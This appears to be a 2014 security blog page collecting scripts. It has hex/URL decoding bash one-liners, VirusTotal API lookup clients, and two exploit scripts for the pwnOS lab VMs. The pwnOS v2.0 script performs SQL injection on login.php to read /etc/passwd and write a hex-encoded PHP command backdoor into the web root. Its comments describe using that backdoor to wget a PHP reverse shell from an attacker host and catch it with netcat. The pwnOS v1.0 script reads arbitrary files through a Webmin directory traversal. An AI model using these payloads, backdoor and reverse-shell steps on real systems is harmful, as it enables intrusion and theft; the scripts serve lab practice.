Tuesday, March 11, 2014

Another Hex to ASCII Deobfuscator

#!/bin/bash

# Written: December 2012
# Modified: March 2014

# This program is built to decode hex to ASCII text
# The program takes what it is given at the command line and then decodes it...

testInput=$1

# echo $testInput -- If you echo it will read the string from the command line
# cat $testInput -- Takes the filename and decodes it
cat $testInput | sed 's/\\x20/ /g' | \
        sed 's/\\x21/!/g' | sed 's/\\x22/"/g' | sed 's/\\x23/#/g' | sed 's/\\x24/$/g' | \
        sed 's/\\x25/\\x/g' | sed 's/\\x26/&/g' | sed "s/\\x27/'/g" | sed 's/\\x28/(/g' | \
        sed 's/\\x29/)/g' | sed 's/\\x2A/*/g' | sed 's/\\x2B/+/g' | sed 's/\\x2C/,/g' | \
        sed 's/\\x2D/-/g' | sed 's/\\x2E/./g' | sed 's/\\x2F/\//g' | sed 's/\\x30/0/g' | \
        sed 's/\\x31/1/g' | sed 's/\\x32/2/g' | sed 's/\\x33/3/g' | sed 's/\\x34/4/g' | \
        sed 's/\\x35/5/g' | sed 's/\\x36/6/g' | sed 's/\\x37/7/g' | sed 's/\\x38/8/g' | \
        sed 's/\\x39/9/g' | sed 's/\\x3A/:/g' | sed 's/\\x3B/;/g' | sed 's/\\x3C/</g' | \
        sed 's/\\x3D/=/g' | sed 's/\\x3E/>/g' | sed 's/\\x3F/?/g' | sed 's/\\x40/@/g' | \
        sed 's/\\x41/A/g' | sed 's/\\x42/B/g' | sed 's/\\x43/C/g' | sed 's/\\x44/D/g' | \
        sed 's/\\x45/E/g' | sed 's/\\x46/F/g' | sed 's/\\x47/G/g' | sed 's/\\x48/H/g' | \
        sed 's/\\x49/I/g' | sed 's/\\x4A/J/g' | sed 's/\\x4B/K/g' | sed 's/\\x4C/L/g' | \
        sed 's/\\x4D/M/g' | sed 's/\\x4E/N/g' | sed 's/\\x4F/O/g' | sed 's/\\x50/P/g' | \
        sed 's/\\x51/Q/g' | sed 's/\\x52/R/g' | sed 's/\\x53/S/g' | sed 's/\\x54/T/g' | \
        sed 's/\\x55/U/g' | sed 's/\\x56/V/g' | sed 's/\\x57/W/g' | sed 's/\\x58/X/g' | \
        sed 's/\\x59/Y/g' | sed 's/\\x5A/Z/g' | sed 's/\\x5B/[/g' | sed 's/\\x5C/\\/g' | \
        sed 's/\\x5D/]/g' | sed 's/\\x5E/^/g' | sed 's/\\x5F/_/g' | sed 's/\\x60/`/g' | \
        sed 's/\\x61/a/g' | sed 's/\\x62/b/g' | sed 's/\\x63/c/g' | sed 's/\\x64/d/g' | \
        sed 's/\\x65/e/g' | sed 's/\\x66/f/g' | sed 's/\\x67/g/g' | sed 's/\\x68/h/g' | \
        sed 's/\\x69/i/g' | sed 's/\\x6A/j/g' | sed 's/\\x6B/k/g' | sed 's/\\x6C/l/g' | \
        sed 's/\\x6D/m/g' | sed 's/\\x6E/n/g' | sed 's/\\x6F/o/g' | sed 's/\\x70/p/g' | \
        sed 's/\\x71/q/g' | sed 's/\\x72/r/g' | sed 's/\\x73/s/g' | sed 's/\\x74/t/g' | \
        sed 's/\\x75/u/g' | sed 's/\\x76/v/g' | sed 's/\\x77/w/g' | sed 's/\\x78/x/g' | \
        sed 's/\\x79/y/g' | sed 's/\\x7A/z/g' | sed 's/\\x7B/{/g' | sed 's/\\x7C/|/g' | \
        sed 's/\\x7D/}/g' | sed 's/\\x7E/~/g' | sed 's/\\x0A/\n/g'

Saturday, March 8, 2014

pwnOS v2.0 - Python Script that utilizes SQL Injection on Login

I wrote this python script to demonstrate SQL injection on pwnOS v2.0.  When it runs it will automate finding the username that the pwnOS database is running as, the displaying of the /etc/passwd file, and the creating of a simple-backdoor.php in the /var/www directory as sb.php.

The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.

#!/usr/bin/python

import socket
import os, sys

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))

# Initial HTTP Request to obtain a PHP Session
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"

s.send(httpRequest)
data = s.recv(1024)

#Save the httpResponse to a file
f = open('temp.txt','w')
f.write(data)
f.close()

# Pull the PHPSESSID out of the file
with open("temp.txt") as file:
        for line in file:
                if 'PHPSESSID' in line:
                        sessionID = line[12:48]

s.recv(1024)

httpRequest = "POST /login.php HTTP/1.1\n"
httpRequest += "Host: 10.10.10.100\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\n"
httpRequest += "Referer: http://10.10.10.100/login.php\n"
httpRequest += "Cookie: " + sessionID + "\n"
httpRequest += "Connection: keep-alive\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\n"

# For the query to find the user account that is running the database
# UNION SELECT 1,2,3,user(),5,6,7,8;-- -

# For the query to pull a file like the /etc/passwd
# Use the same process to display the passwords in /var/mysqli_connect.php
# UNION SELECT 1,2,3,load_file(/etc/passwd),5,6,7,8;-- -    # This does not work due to /etc/passwd needs to be hex encoded
# echo -n "/etc/passwd" | xxd -ps -                         # This from the command line will hex encode the file for us
# The following query will work to pull the /etc/passwd file from the file system
# UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -
# For the query to place the simple-backdoor.php in the /var/www/sb.php
# I used echo -n <of the simple-backdoor.php condensed to 1 line> | xxd -ps -
# UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php'

# After the backdoor file exists you can use it to then copy a php-reverse-shell.php from /usr/share/webshells to /var/www/blog/config
# To do this you can:
(kali) # cd /usr/share/webshells/php/
(kali) # python -m SimpleHTTPServer   # Setup a listening webserver on port 8000 to pull the reverse shell from
# URL: http://10.10.10.100/sb.php?cmd=wget http://10.10.10.1:8000/php-reverse-shell.php -O /var/www/blog/config/reverse.php
# The config directory allows the www-data user to write to it
# Then on kali start listening on the port specified in the php-reverse-shell.php with ip of 10.10.10.1
(kali) # nc -lvp
# Then visit on the victim URL: http://10.10.10.100/config/blog/reverse.php
# This will also allow you to see /var/mysqli_config.php from a semi-shell

print "Select Query\n"
print "1. Pull user account that the database is running as\n"
print "2. Pull /etc/passwd File\n"
print "3. Drop php backdoor into /var/www/sb.php\n"
print "4. Custom Query\n"
query = raw_input('Select: ')

if query == '1':
        querySelected = "UNION SELECT 1,2,3,user(),5,6,7,8;-- -"
elif query == '2':
        querySelected = 'UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -'
elif query == '3':
        querySelected = "UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php';-- -"
elif query == '4':
        querySelected = raw_input('Custom Query: ')

postInfo = "email=' " + querySelected + "&pass=thepcnerd&submit=Login&sumbitted=TRUE\n\n"
lengthPostInfo = len(postInfo)

httpRequest += "Content-Length: " + str(lengthPostInfo) + "\n\n"
httpRequest += postInfo

s.send(httpRequest)

if query == '1':
        data = s.recv(4096)
        #print data

        #Save the httpResponse to a file
        f = open('temp2.txt','w')
        f.write(data)

        f.close()

        # Pull the <h1> out of the file
        with open("temp2.txt") as file:
                for line in file:
                        if '<h1>' in line:
                                print line

elif query == '2':
        data = s.recv(4096)
        #print data

        #Save the httpResponse to a file
        f = open('temp2.txt','w')
        f.write(data)
        f.close()

        data = s.recv(4096)
        #print data

        #Save the httpResponse to a file
        f = open('temp2.txt','a')
        f.write(data)
        f.close()

        with open("temp2.txt") as file:
                for line in file:
                        print line

elif query == '3':
        data = s.recv(4096)
        print data

elif query == '4':
        data = s.recv(4096)
        print data
        data = s.recv(4096)

        print data


pwnOS v1.0 Python Script for Reading files through Directory Traversal

I was working with the pwnOS v1.0 to be able to gain root.  One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem.  I liked the metasploit module but I found that I wanted a quicker script and something I could save the output with.  I then designed the following script using python:

#!/usr/bin/python

# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability.  This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit.  You can also redirect the output to a file.


import socket
import os, sys
import urllib

if len(sys.argv) > 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.11.151',10000))

        # Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]

httpRequest = "GET " + url + " HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"

s.send(httpRequest)
for i in range(1,15):
data = s.recv(1024)
print data

else:
print "Usage: ./displayFile.py file"
print "The file in this case is any file on the file system you can pull.\n\n"

Wednesday, March 5, 2014

Decode Hex to ASCII Bash Script

cat $1 | sed 's/%20/ /g' | sed 's/%22/"/g' | sed 's/%28/(/g' | sed 's/%29/)/g' | sed 's/%3E/>/g' | \
            sed 's/%3D/=/g'  | sed 's/%3B/;/g' | sed 's/%7C/|/g'  | sed 's/%2C/,/g' | \
            sed 's/%7B/{/g' | sed 's/%7D/}/g' | sed 's/%3C/</g' | sed 's/%3F/?/g' | sed 's@%2F@/@g' | \
            sed 's/%0A/\n/g' | sed "s/%27/'/g" | sed 's/%26/\&/g' | sed 's/%3A/:/g' | \
            sed 's/%5C/\\/g' | sed 's/%2B/+/g' | sed 's/%21/!/g'

VirusTotal API Submission - Domain Report

This is helpful:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys
import pprint

url = "https://www.virustotal.com/vtapi/v2/domain/report"

if (len(sys.argv) > 1):
        submitDomain = sys.argv[1]
        parameters = {"domain": submitDomain,   "apikey": "---API Key---"}
        response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
        response_dict = json.loads(response)
        #print response_dict
        print json.dumps(response_dict, indent=4)
else:
        print "Usage: ./domainReport.py <domain>"

VirusTotal API Submission - Submit URL

Found this to be helpful:

#!/usr/bin/python

import json
import simplejson
import urllib
import urllib2
import sys

url = "https://www.virustotal.com/vtapi/v2/url/scan"

if (len(sys.argv) > 1):
        submitURL = sys.argv[1]
        parameters = {"url": submitURL, "apikey": "---API Key---"}
        data = urllib.urlencode(parameters)
        req = urllib2.Request(url,data)
        response = urllib2.urlopen(req)
        output = json.loads(response.read())
        print json.dumps(output, indent=4)
else:
        print "Usage: ./submitURL <url>"

VirusTotal API Submission - IP Address Report

Found this to be helpful in gathering reports about IP Addresses:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys
import pprint

url = "https://www.virustotal.com/vtapi/v2/ip-address/report"

if (len(sys.argv) > 1):
        submitIP = sys.argv[1]
        parameters = {"ip": submitIP,   "apikey": "---API Key---"}
        response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
        response_dict = json.loads(response)
        #print response_dict
        print json.dumps(response_dict, indent=4)
else:
        print "Usage: ./ipAddressReport <ip>"

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...